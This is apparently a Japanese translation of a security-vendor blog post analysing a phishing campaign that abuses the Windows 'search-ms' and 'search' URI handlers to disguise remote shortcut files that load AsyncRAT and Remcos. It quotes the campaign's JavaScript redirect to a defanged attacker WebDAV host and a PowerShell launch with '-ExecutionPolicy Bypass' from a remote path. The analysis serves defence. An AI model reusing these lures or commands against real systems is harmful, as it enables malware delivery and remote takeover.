ファイル検索の先に：”search-ms “URIプロトコルハンドラを悪用する新たな手法

By  Mathanraj Thangaraju, Sijo Jacob · August 03, 2023

図1：攻撃の実行フロー

脅威の概要

日々進化するサイバー脅威の中で、マルウェアの作者は、疑うことを知らないユーザーを悪用するための新たな手段を絶えず模索しています。Windowsオペレーティング・システムには、ユーザーがコンピュータ上のファイル、フォルダ、その他のアイテムを素早く見つけることができる強力な検索機能が用意されています。この検索機能のあまり知られていない側面の1つに、ローカル検索を実行するための拡張検索機能を提供する「search-ms」URIプロトコルハンドラがあります。また、リモートホストにあるファイル共有に対してクエリーを実行する機能も提供しており、Trellix Researchのブログで説明されているように、これを悪用することも可能です。

Trellix Advanced Research Center は、”search-ms” URI プロトコルハンドラを利用した新しい攻撃手法を発見しました。私たちは、攻撃者が悪意のある文書を通じて「search-ms」URIプロトコルハンドラを悪用していることをすでに認識していましたが、私たちの調査により、攻撃者のアプローチが進化していることが明らかになりました。私たちは、攻撃者がページ上でホストされているJavaScriptを使用して、「search-ms」機能を悪用するウェブサイトにユーザーを誘導していることを発見しました。この手法はHTMLの添付ファイルにまで拡張され、攻撃対象が拡大しています。私たちの研究では、「search-ms」プロトコルの機能だけでなく、「search」プロトコルについても調査しました。search」アプリケーション・プロトコルは、Windows VistaのSP1以降のバージョンで作成されました。オペレーティング・システムは、デフォルトのデスクトップ検索アプリケーションを起動するためにsearchプロトコルを使用します。両方のプロトコルのパワーを活用し、バッチ、Visual Basic、PHP、PowerShellなど、さまざまなスクリプトファイルで検索機能を利用することに成功しました。これは、悪意のある活動を実行するために両方の検索プロトコルの機能を利用するという、この攻撃手法の多様性と有効性を示しています。

「search」/「search-ms」URIプロトコルハンドラを活用した攻撃では、脅威行為者は、ユーザーを危険なWebサイトにリダイレクトするハイパーリンクや電子メールの添付ファイルを含む偽の電子メールを作成する可能性があります。ユーザがウェブサイトにアクセスすると、悪意のあるJavaスクリプトが「search」/「search-ms」URIプロトコルハンドラを使用してリモートサーバ上で検索を開始します。リモートでホストされている悪意のあるショートカットファイルの検索結果は、ローカルの検索結果と同様に、PDFやその他の信頼できるアイコンとしてWindowsエクスプローラーに表示されます。この巧妙なテクニックは、ユーザーにリモートファイルが提供されているという事実を隠し、ユーザーに信頼の錯覚を与えます。その結果、ユーザーは自分のシステムからのファイルだと思い込んでファイルを開き、無意識のうちに悪意のあるコードを実行してしまう可能性が高くなります。

このブログでは、脅威行為者が「search-ms」URIプロトコル・ハンドラを悪意のある活動の手段としてどのように活用しているのか、また、最初の配信からペイロードの実行に至るまでのステップについて包括的に理解することを目的としています。

感染の連鎖

図1：攻撃の実行フロー

フィッシングの実例

Trellixアドバンストリサーチセンターは、”search-ms “URIプロトコルハンドラを使用し、悪意のあるペイロードをダウンロードするフィッシングメールを確認しています。これらのフィッシングメールは、営業部長からの緊急の見積依頼であるかのように装い、受信者を騙して悪意のあるリンクをクリックさせようとしています。

図2：フィッシングメールのサンプル

私たちの調査では、HTMLやPDFの添付ファイルを持つ電子メールの利用など、他の形態の攻撃亜種に遭遇しました。これらの添付ファイルには、「search-ms」URI プロトコルハンドラを組み込んだ侵害されたウェブサイトのホスティングスクリプトにつながる URL が含まれていました。さらに、HTMLファイルにも、「search-ms」URIプロトコルハンドラの実行をトリガーするスクリプトを埋め込むことで、攻撃を開始することができます。

図3：”search-ms “URIプロトコルハンドラを含むURLを持つPDFファイル

電子メールや添付ファイルのリンクをクリックすると、受信者は「search-ms」URIプロトコルハンドラを悪用したウェブサイトにリダイレクトされます。以下では、図2のpage.htmlに対するGETリクエストを見て、疑わしいスクリプトを強調しています。

図4：”search-ms “URIプロトコル・ハンドラを使ったHTML

見えない脅威：URIプロトコル・ハンドラ “Search-MS “のダークサイドを解明する

上の図で強調表示されているコード・スニペットは、「search-ms」URIプロトコル・ハンドラを呼び出して、攻撃者がコントロールするサーバー上で検索操作を実行します。コードを分解し、その構成要素を理解しましょう。

• <script></script>と記述します：このコードは<script>タグ内にカプセル化され、HTML文書内のJavaScriptコードを示します。
• window.location.href：このJavaScriptステートメントは、ウェブページの現在のURLまたは場所を参照します。このプロパティを変更することで、ユーザーを別の場所にリダイレクトすることができます。
• ‘search-ms:query=Review&crumb=location: \dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSLDavWWRoot&displayname=Search’：これはwindow.location.hrefプロパティに割り当てられた値です。ユーザーがリダイレクトされるターゲットURLまたは場所を表します。
• search-ms：これはWindows Searchプロトコルの使用を示すプロトコル識別子です。
• query=Review：query “パラメータは検索条件を指定し、この場合は “Review “に設定されています。これは、検索操作が用語「レビュー」に関連するアイテムを見つけることに焦点を当てることを示します。
• crumb=location:◆dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSLDavWWRoot：crumb」パラメータは、検索の場所またはパスの制約を定義します。値 “location: \dhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com@SSLDavWWRoot” は、検索を実行する特定の場所またはフォルダパスを指定します。
• displayname=Search：displayname “パラメータは、検索クエリのカスタム名を設定します。

すべてをまとめると、このコードはwindow.location.hrefプロパティを設定し、「search-ms」URIプロトコル・ハンドラを使用して検索操作を開始します。検索は、指定された場所（ここではリモート・ファイル・サーバー）内の「Review」に関連するアイテムを探します。

クリックの裏側ユーザー・インタラクションを理解する

電子メールの受信者が悪意のあるリンクをクリックすると、通常、「Windowsエクスプローラを開く」という警告がクリック可能なボタンとして表示されます。これをクリックすると、ユーザーは検索クエリに一致するファイルが保存されているフォルダまたはディレクトリに移動することができます。

図5：Windowsエクスプローラーを開く警告

ユーザーがWindowsエクスプローラーを開くことを許可した場合、実行される操作に 応じて、いくつかのリクエストがサーバーに送られます。図6から、サーバーがサポートする利用可能なメソッドと機能を取得するために送信されるOPTIONSリクエストを観察します。

図6：オプションのリクエスト

さらに、PROPFIND メソッドの使い方も見てみましょう。これは、サーバ上のリソースやコレクションに関連付けられたメタデータやプロパティを取得するものです。これらのプロパティには、リソースの名前、サイズ、作成日、変更日、その他のカスタム定義属性などの情報を含めることができます。このメソッドは、図4（query=Review）で述べたように、「Review」という用語に関連するアイテムを検索するために使用されます。多 く の場合、 検索はデ ィ レ ク ト リ のルー ト か ら 始ま り 、 PROPFIND メ ソ ッ ド の再帰的な動作に よ っ て項目が取得 さ れ る か ど う かはサーバの設定に よ っ て異な る 可能性があ り ます：

図7：用語 “Review “に関連するアイテムを見つけるPROPFINDメソッド

WebDAV のファイルに対する PROPFIND メ ソ ッ ド に対 し て受け取 ら れ る 応答は、 通常 XML 形式の応答であ り 、 その中に要求 さ れたプ ロ パテ ィ やフ ァ イ ルの メ タ デー タ が含まれてい ます。XML レスポンスの正確な構造や内容は、WebDAV サーバーの実装や要求されたプロパティによって異なります。しかし、レスポンスにはファイルのプロパティを表す要素と属性が含まれます。

図8：PROPFIND法のレスポンス

図9：XML 形式の PROPFIND メソッド応答

ショートカットファイル(Review_200630_DeletedItem.lnk)のプロパティを受信すると、GETメソッドを使用してファイルの内容を取得します。

図10：GETメソッドによるショートカット・ファイルの取得

図4で述べた “search-ms “クエリーで提供されたパラメーターに基づき、Windowsエクスプローラーのウィンドウは、”Review “に関連するアイテムの検索結果を以下に表示します。

図11：検索結果が表示されたWindowsエクスプローラウィンドウ

この攻撃で使用された他のショートカットファイルの一部を図12に示します。攻撃者は、疑うことを知らない被害者を騙すためにさまざまな手口を用いますが、ショートカットファイルのアイコンやファイル名を操作することもその1つです。このような欺瞞的な手口は、人間の心理を巧みに利用し、ユーザーを悪意のあるコンテンツに誘導するために注意深く作られています。攻撃者は、正規のアプリケーションに似せたアイコンを割り当てたり、緊急性や重要性があるように見えるファイル名を選択したりすることで、誤った信頼感や緊急性を植え付けることを目的としています。また、ショートカットファイルの各バリエーションは、固有のシグネチャやフィンガープリントを持つ可能性があり、セキュリティツールによる識別やブロックが困難になります。

図12：検索キーワードに基づいて異なるショートカットファイルを表示するWindowsエクスプローラ

被害者が開いたショートカット・ファイルをクリックすると、コマンドラインで参照されている悪意のあるDLLファイルがregsvr32.exeユーティリティを使って実行されます。

図13：ショートカット・ファイル・コマンド

図 14：PROPFIND と GET メソッドを使用して取得した DLL ファイル

すべてのネットワーク・アクティビティにおいて、攻撃者はネットワーク保護対策を回避する巧妙な戦術としてSSL（セキュア・ソケット・レイヤー）暗号化を採用しています。SSLを活用することで、攻撃者は暗号化されたトラフィック内に悪意のある活動を隠すことに成功し、従来のネットワーク・セキュリティ制御を効果的に回避しました。この攻撃の本質を明らかにするために、キャプチャされたネットワーク・トラフィックは、説明のために復号化されています。この復号化により、攻撃者が利用した高度なテクニックを分析・理解することができ、攻撃者の戦略に対する貴重な洞察が得られるとともに、このような脅威と闘うための知識を深めることができます。

代替テクニックPowerShellベースの攻撃バリエーション

このバリアントでは、SwiftCopyショートカットファイルは以下のパラメータでPowerShell実行ファイル(powershell.exe)を実行します：

• ‘-ExecutionPolicy Bypass’ でPowerShellの実行ポリシーをバイパス。
• ‘-File \internetshortcuts[.]link@80ePWXBTXUЪover.ps1’を指定して、指定されたネットワーク場所にある ‘over.ps1’ という名前のPowerShellスクリプトファイルのパスを指定します。

このコードは、スクリプトの実行を制限することなく実行するように設計されているため、潜在的に有害なコマンドやアクションを実行することができます。

図 15：Swiftcopy LNK ファイルの実行

調査中、このキャンペーンで複数のPowerShellファイルの亜種を発見しました：

• over.ps1」ファイルは、ISOファイルをダウンロードし、そこからDLLを抽出し、DLLを特定のディレクトリにコピーし、regsvr32.exeを使って登録し、仮想ディスクをマウント解除します。
• ISOファイルを使用する代わりに、PowerShellスクリプトがDLLペイロードを直接ダウンロードし、それを実行する亜種。
• EXE ペイロードを含む zip ファイルのダウンロードをトリガーする PowerShell スクリプト。
• DLLファイルをダウンロードして実行するPowerShellスクリプトと、被害者を欺くためのおとりPDFファイルのオープン。
• VBSファイルをダウンロードして実行するPowerShellスクリプト。VBSファイルはPowerShellを実行し、悪意のあるDLLを正規のファイルにインジェクションし、おとりPDFファイルを開いて被害者を欺きます。

図16：このキャンペーンで使用したPowerShellファイルのバリエーション

図 17: ISO ファイルを使用した PowerShell バリアントの動的実行

悪意のあるペイロードが解き放たれる：リモートアクセス型トロイの木馬の動き

このキャンペーンでは、ダウンロードされたペイロードはリモートアクセストロージャン（RAT）であり、具体的にはAsync RATとRemcos RATです。RATは、権限のない個人が感染したシステムを遠隔操作できるようにする悪意のあるソフトウェアです。RATがターゲットに感染すると、機密情報の窃取、ユーザー活動の監視、コマンドの実行、さらには他の接続デバイスへの拡散など、さまざまな悪意のある活動を実行することができます。

注目すべきは、Remcos RAT の EXE ペイロードにヌルバイトが注入されていることです。これは、セキュリティ製品による検出を回避するために採用されている手法です。ヌルバイトを実行ファイルに注入することで、RATはファイルのシグネチャやパターンに依存するセキュリティメカニズムを回避することができ、検知されずに動作し、侵害されたシステム内に侵入して持続する可能性を高めることができます。Trellixは、検出を回避するために使用されるこのようなテクニックを特定し、軽減する機能を備えています。

検知を逃れる：攻撃者が巧妙に利用するファイルの範囲に迫る

調査の結果、攻撃者は定期的にファイルを更新することで、プロアクティブなアプローチを採用していることがわかりました。この戦略は、セキュリティ製品による検知を回避するために意図的に採用されています。ファイルを頻繁に更新することで、攻撃者は静的シグネチャや既知の侵害指標に依存するセキュリティ対策を回避することを目的としています。

図18：侵害されたウェブサイトで発見された最初の攻撃ベクトルとして使用された複数のhtml

また、攻撃者が管理する複数のファイル・サーバーが発見され、これらのファイル・サーバーはさまざまな悪意のあるファイルやツールのリポジトリとして機能していました。さらに問題だったのは、正規のサーバーのいくつかが適切な認証手段を欠いており、攻撃者に無制限のアクセスを提供していたことです。このようなサーバーへの無制限のアクセスは、攻撃者がこれらの弱点を悪用して比較的簡単にさらなる攻撃を仕組める可能性があるため、深刻なセキュリティ・リスクをもたらしていました。

図19：攻撃者のサーバーで確認された複数のファイル

というのも、ドキュメントを悪用する対象者は、脆弱なバージョンを持っていないかもしれないし、パッチを当てているかもしれないからだ。しかしこのケースでは、単にURLを訪問しただけで攻撃が開始されました。

調査中、我々は “search”/”search-ms “プロトコルが下図に見られるようにHTMLファイル内で複数の方法で実行できることを発見し、その柔軟性と異なるシナリオでの悪用の可能性を明らかにしました。

図20：HTMLファイルで検索クエリを実行するいくつかの方法

脅威行為者は、「search」/「search-ms」URI プロトコルハンドラを使用して、さまざまなファイルタイプを使用した攻撃を仕掛けることができます。私たちの調査では、バッチ、PowerShell、Visual Basic、PHP、Officeマクロファイルなど、さまざまなファイルタイプでこのプロトコルを利用することに成功しました。スクリプトファイルにこの方法を採用することで、図5に見られるようなWindowsエクスプローラーを開くアラートが表示されなくなり、ユーザーとのインタラクションが減少することが確認されました。この方法は、適応性が高く、アクセスしやすいため、他の脅威行為者にとって魅力的な手口である可能性があります。

図21: 異なるファイル・タイプを使用した ms 検索クエリの実行

search」/「search-ms」URIプロトコル・ハンドラを無効にするには、管理者権限で以下のコマンドを実行：

• reg delete HKEY_CLASSES_ROOTsearch /f
• reg delete HKEY_CLASSES_ROOTsearch-ms /f

結論

search”/”search-ms “URIプロトコル・ハンドラーは、強力な初期攻撃ベクトルとして出現したため、この方法を利用した攻撃が増加する可能性を予測することが極めて重要です。これは、従来のセキュリティ防御を回避しながら悪意のあるペイロードを配信する便利な手段を脅威行為者に提供します。安全を確保するためには、ユーザーは信頼できないリンクに注意し、警戒する必要があります。不審なURLをクリックしたり、未知のソースからファイルをダウンロードしたりすることは、システムを「search」/「search-ms」URIプロトコル・ハンドラを通じて配信される悪意のあるペイロードにさらす可能性があるため、控えることが極めて重要です。この手法を利用した攻撃の増加傾向を認識し、リスクを軽減するための積極的な対策を講じることで、セキュリティ体制を強化し、このような新たなサイバー脅威から効果的に保護することができます。共に、進化し続けるサイバー攻撃に対抗するため、警戒、適応、情報収集を怠らないようにしましょう。

Trellix製品のカバレッジ

Trellix Email Securityは、URL、メール、ネットワーク、添付ファイルの各レベルでのチェックを含む多層的な検知戦略により、潜在的な脅威を確実に発見し、お客様に害が及ばないようにします。新しい脅威や変化する脅威に先んじるために、私たちの製品は継続的に脅威インテリジェンスデータベースを監視し、更新しています。これには、Trellix Multi-Vector Virtual Execution Engine、新しいマルウェア対策コアエンジン、機械学習による振る舞い分類とAI相関エンジン、Trellix Dynamic Threat Intelligence (DTI) Cloudからのリアルタイムの脅威インテリジェンス、および攻撃ライフサイクル全体にわたる防御が含まれ、お客様の組織をより安全で回復力のある状態に保ちます。

Trellixの保護

MITRE ATT&CK® Techniques

侵害の痕跡 (IoCs):
Hashes

Domain/Host/URLs

Remcos Configuration

AsyncRAT Configuration